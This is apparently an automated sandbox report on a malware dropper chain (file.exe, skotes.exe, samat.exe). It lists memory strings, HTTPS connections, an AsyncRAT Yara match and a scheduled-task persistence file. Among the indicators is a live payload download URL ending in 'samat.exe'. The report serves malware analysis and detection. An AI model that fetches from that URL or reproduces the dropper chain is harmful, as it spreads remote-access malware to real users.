Source: samat.exe, 00000008.00000002.4562192857.000001BCCCF10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://packaging.python.org/specifications/entry-points/
Source: samat.exe, 00000008.00000003.3002201844.000001BCCBFC1000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4557702763.000001BCCC500000.00000004.00001000.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3008392971.000001BCCC3E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://peps.python.org/pep-0205/
Source: samat.exe, 00000008.00000002.4569745344.00007FF8A8CF8000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://peps.python.org/pep-0263/
Source: samat.exe, 00000008.00000002.4562310783.000001BCCD010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://peps.python.org/pep-0685/
Source: samat.exe, 00000008.00000002.4562310783.000001BCCD010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://peps.python.org/pep-0685/Pp
Source: samat.exe, 00000008.00000002.4562192857.000001BCCCF10000.00000004.00001000.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4562310783.000001BCCD010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://pypi.org/project/build/).
Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pypi.org/project/importlib_metadata
Source: samat.exe, 00000007.00000003.2998761244.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pypi.org/project/setuptools/
Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://readthedocs.org/projects/importlib-metadata/badge/?version=latest
Source: samat.exe, 00000008.00000002.4561839036.000001BCCCC00000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://refspecs.linuxfoundation.org/elf/gabi4
Source: samat.exe, 00000008.00000002.4565219957.000001BCCDA30000.00000004.00001000.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://requests.readthedocs.io
Source: samat.exe, 00000008.00000002.4562310783.000001BCCD010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://setuptools.pypa.io/en/latest/
Source: samat.exe, 00000008.00000003.3015789886.000001BCCC368000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3008939140.000001BCCC35F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://setuptools.pypa.io/en/latest/pkg_resources.html
Source: samat.exe, 00000008.00000003.3016877538.000001BCCC468000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3021175651.000001BCCC468000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4501044998.000001BCCC465000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3014481401.000001BCCC494000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024391863.000001BCCC374000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4504313591.000001BCCC469000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4498534466.000001BCCC431000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3008939140.000001BCCC350000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3018744804.000001BCCC468000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4502404142.000001BCCC466000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3014733441.000001BCCC495000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3020091541.000001BCCC468000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://setuptools.pypa.io/en/latest/pkg_resources.html#basic-resource-access
Source: samat.exe, 00000008.00000002.4557868272.000001BCCC600000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packages
Source: samat.exe, 00000008.00000002.4557868272.000001BCCC600000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packages0
Source: samat.exe, 00000008.00000003.3008901685.000001BCCC4B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesr;
Source: samat.exe, 00000008.00000003.3008901685.000001BCCC4B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesr;r
Source: skotes.exe, 00000006.00000003.2967423453.000000000113A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000003.2967280151.000000000113A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://thedotmediagroup.com/samat.exe
Source: skotes.exe, 00000006.00000003.2967423453.000000000111F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://thedotmediagroup.com/samat.exe4
Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tidelift.com/badges/package/pypi/importlib-metadata
Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tidelift.com/subscription/pkg/pypi-importlib-metadata?utm_source=pypi-importlib-metadata&utm
Source: samat.exe, 00000008.00000003.4517974970.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527305134.000001BCCC8A3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527003356.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
Source: samat.exe, 00000008.00000003.4525592506.000001BCCD3F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527418573.000001BCCD427000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc3610
Source: samat.exe, 00000008.00000003.4527418573.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4546531019.000001BCCD439000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531996429.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4563930588.000001BCCD439000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc5297
Source: samat.exe, 00000008.00000003.4527003356.000001BCCC85F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4500352032.000001BCCC830000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4509758777.000001BCCC85C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025267001.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4516102312.000001BCCC85E000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024006784.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025997180.000001BCCC89B000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC832000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025267001.000001BCCC85F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
Source: samat.exe, 00000008.00000003.4511515721.000001BCCCA6D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCA43000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4519148634.000001BCCCA6D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524896627.000001BCCCA6D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4500760862.000001BCCCA6C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499341916.000001BCCCA43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
Source: samat.exe, 00000008.00000002.4562310783.000001BCCD010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
Source: samat.exe, 00000007.00000003.2998761244.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wheel.readthedocs.io/
Source: samat.exe, 00000007.00000003.2998761244.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wheel.readthedocs.io/en/stable/news.html
Source: samat.exe, 00000008.00000003.4523254156.000001BCCC351000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4510813361.000001BCCC350000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4533987100.000001BCCC355000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505782582.000001BCCC34F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3022667291.000001BCCC895000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024391863.000001BCCC339000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506796860.000001BCCC350000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3022667291.000001BCCC832000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4503973184.000001BCCC339000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4518665999.000001BCCC350000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4547284877.000001BCCC355000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www-cs-faculty.stanford.edu/~knuth/fasc2a.ps.gz
Source: chrome.exe, 00000010.00000002.3224153425.000037F40001C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/
Source: samat.exe, 00000008.00000003.4525592506.000001BCCD3F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529014883.000001BCCD406000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ietf.org/rfc/rfc2898.txt
Source: samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4569235767.00007FF8A88D4000.00000002.00000001.01000000.00000015.sdmp, samat.exe, 00000008.00000002.4575482398.00007FF8B83F0000.00000002.00000001.01000000.00000019.sdmp	String found in binary or memory: https://www.openssl.org/H
Source: samat.exe, 00000008.00000002.4559686522.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517974970.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527003356.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org
Source: samat.exe, 00000008.00000003.3023133248.000001BCCC89F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025267001.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3023133248.000001BCCC835000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024006784.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4503744422.000001BCCC8A7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025997180.000001BCCC89B000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505195812.000001BCCC8A9000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4525393736.000001BCCC8BC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org/
Source: samat.exe, 00000007.00000003.2998761244.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org/dev/peps/pep-0427/
Source: samat.exe, 00000008.00000002.4569745344.00007FF8A8CF8000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://www.python.org/psf/license/)
Source: samat.exe, 00000008.00000003.4499341916.000001BCCC9FF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4560683562.000001BCCCA03000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4532754927.000001BCCCA03000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527548212.000001BCCCA03000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
Source: samat.exe, 00000008.00000003.4515697372.000001BCCD327000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwww.certigna.fr/autorites/
Source: samat.exe, 00000008.00000003.4524395230.000001BCCD342000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4522465597.000001BCCD32F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523681717.000001BCCD337000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4562686604.000001BCCD347000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515697372.000001BCCD327000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529360624.000001BCCD347000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwww.certigna.fr/autorites/0m
Source: samat.exe, 00000008.00000003.4523890696.000001BCCC99A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531671427.000001BCCC99A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC7BF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513181603.000001BCCC7E8000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4507086114.000001BCCC7C0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523746156.000001BCCC7E9000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4502168541.000001BCCC995000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yahoo.com/

Source: unknown	Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50177
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50179
Source: unknown	Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50180
Source: unknown	Network traffic detected: HTTP traffic on port 50154 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50182
Source: unknown	Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50180 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50177 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49946 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50018 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50185
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50187
Source: unknown	Network traffic detected: HTTP traffic on port 50025 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50159 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50195
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50195 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50172 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49944 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50020 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown	Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50023 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49942
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown	Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50164 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown	Network traffic detected: HTTP traffic on port 50187 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown	Network traffic detected: HTTP traffic on port 50161 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 50173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown	Network traffic detected: HTTP traffic on port 50152 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50023
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50025
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50024
Source: unknown	Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50166 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50019 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50152
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50154
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50157
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50159
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50182 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50179 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49982 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50041
Source: unknown	Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50161
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50041 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 50171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50164
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50166
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50167
Source: unknown	Network traffic detected: HTTP traffic on port 50157 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50171
Source: unknown	Network traffic detected: HTTP traffic on port 50185 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50173
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50172
Source: unknown	Network traffic detected: HTTP traffic on port 49993 -> 443

Source: unknown	HTTPS traffic detected: 188.165.52.14:443 -> 192.168.2.5:49824 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50152 version: TLS 1.2

Source: C:\Windows\System32\dxdiag.exe

Windows user hook set: 0 mouse low level C:\Windows\system32\dinput8.dll

Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe

Code function: 8_2_00007FF8B7EB5CD0 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,PyExc_TypeError,PyErr_SetString,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,CryptImportKey,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,??1PyWinBufferView@@QEAA@XZ,

8_2_00007FF8B7EB5CD0

System Summary

Malicious sample detected (through community Yara rule)

Source: dump.pcap, type: PCAP

Matched rule: Detects AsyncRAT Author: ditekSHen

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name:

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\Tasks\skotes.job			Jump to behavior
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 7_2_00007FF7E12E6964	7_2_00007FF7E12E6964
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 7_2_00007FF7E12C89E0	7_2_00007FF7E12C89E0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 7_2_00007FF7E12E5C00	7_2_00007FF7E12E5C00
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 7_2_00007FF7E12E08C8	7_2_00007FF7E12E08C8
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 7_2_00007FF7E12C1000	7_2_00007FF7E12C1000
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 7_2_00007FF7E12DDA5C	7_2_00007FF7E12DDA5C
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 7_2_00007FF7E12CA2DB	7_2_00007FF7E12CA2DB
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 7_2_00007FF7E12D1944	7_2_00007FF7E12D1944
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 7_2_00007FF7E12D2164	7_2_00007FF7E12D2164
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 7_2_00007FF7E12D39A4	7_2_00007FF7E12D39A4
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 7_2_00007FF7E12E08C8	7_2_00007FF7E12E08C8
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 7_2_00007FF7E12E6418	7_2_00007FF7E12E6418
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 7_2_00007FF7E12CA474	7_2_00007FF7E12CA474
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 7_2_00007FF7E12CACAD	7_2_00007FF7E12CACAD
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 7_2_00007FF7E12D1B50	7_2_00007FF7E12D1B50
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 7_2_00007FF7E12E3C10	7_2_00007FF7E12E3C10
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 7_2_00007FF7E12D2C10	7_2_00007FF7E12D2C10
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 7_2_00007FF7E12E5E7C	7_2_00007FF7E12E5E7C
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 7_2_00007FF7E12D9EA0	7_2_00007FF7E12D9EA0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 7_2_00007FF7E12DDEF0	7_2_00007FF7E12DDEF0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 7_2_00007FF7E12D1D54	7_2_00007FF7E12D1D54
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 7_2_00007FF7E12D5D30	7_2_00007FF7E12D5D30
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 7_2_00007FF7E12DE570	7_2_00007FF7E12DE570
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 7_2_00007FF7E12D35A0	7_2_00007FF7E12D35A0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 7_2_00007FF7E12E1874	7_2_00007FF7E12E1874
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 7_2_00007FF7E12E40AC	7_2_00007FF7E12E40AC
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 7_2_00007FF7E12D80E4	7_2_00007FF7E12D80E4
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 7_2_00007FF7E12D1740	7_2_00007FF7E12D1740
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 7_2_00007FF7E12E9728	7_2_00007FF7E12E9728
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 7_2_00007FF7E12D8794	7_2_00007FF7E12D8794
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 7_2_00007FF7E12D1F60	7_2_00007FF7E12D1F60
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 7_2_00007FF7E12C9800	7_2_00007FF7E12C9800
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF7E12E6964	8_2_00007FF7E12E6964
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF7E12C1000	8_2_00007FF7E12C1000
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF7E12DDA5C	8_2_00007FF7E12DDA5C
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF7E12CA2DB	8_2_00007FF7E12CA2DB
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF7E12D1944	8_2_00007FF7E12D1944
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF7E12D2164	8_2_00007FF7E12D2164
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF7E12D39A4	8_2_00007FF7E12D39A4
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF7E12C89E0	8_2_00007FF7E12C89E0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF7E12E08C8	8_2_00007FF7E12E08C8
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF7E12E6418	8_2_00007FF7E12E6418
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Code function: 8_2_00007FF7E12CA474	8_2_00007FF7E12CA474
